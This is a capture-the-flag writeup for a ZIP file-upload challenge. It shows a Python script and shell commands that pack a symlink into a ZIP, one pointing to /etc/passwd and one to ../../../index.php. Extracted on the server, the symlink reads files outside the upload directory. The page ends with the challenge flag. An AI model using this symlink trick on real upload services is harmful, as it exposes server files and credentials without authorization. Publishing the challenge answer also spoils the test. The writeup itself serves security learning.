← Back
File-upload-ZIP | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.

View on GitHub

First, we can create symlink inside a zip file, as shown here symbolic soft link in zip

I’m using this script

import os
import zipfile
import stat

# Create the symlink
symlink_name = 'data.txt'
target = '../../../index.php'  # Path to the target file
os.symlink(target, symlink_name)

# Create the zip
with zipfile.ZipFile('payload.zip', 'w') as zf:
    # Save the symlink as a ZIP entry
    info = zipfile.ZipInfo(symlink_name)
    info.create_system = 3  # Unix
    # Set symlink file mode: 0o120777 = symlink with 0777 perms
    info.external_attr = (stat.S_IFLNK | 0o777) << 16  # Shift to match Zip format
    zf.writestr(info, target)  # Write the target path as file contents

# Clean up
os.remove(symlink_name)

However, we can simply also execute those lines:

ln -s /etc/passwd symlink
zip --symlink payload.zip symlink

### checking
unzip payload.zip -d extracted/
ls -l extracted/

So, here you can see the creation using cmd: manually create symlink

And here you can see using the script: create using script

Okay, now let’s adjust the content, we want to create file which is called data.txt, which will be symlink to ../../../index.php Because we need to go down, in the hierarchy of directories:

ch51/tmp/upload/688fd0b03c9c86.85044017/../../../index.php

So, I adjust the script, and then uploaded payload.zip

When accessing data.txt on its path, we simply going to ../../../index.php, which gives us the data.

FINAL

Flag: N3v3r_7rU5T_u5Er_1npU7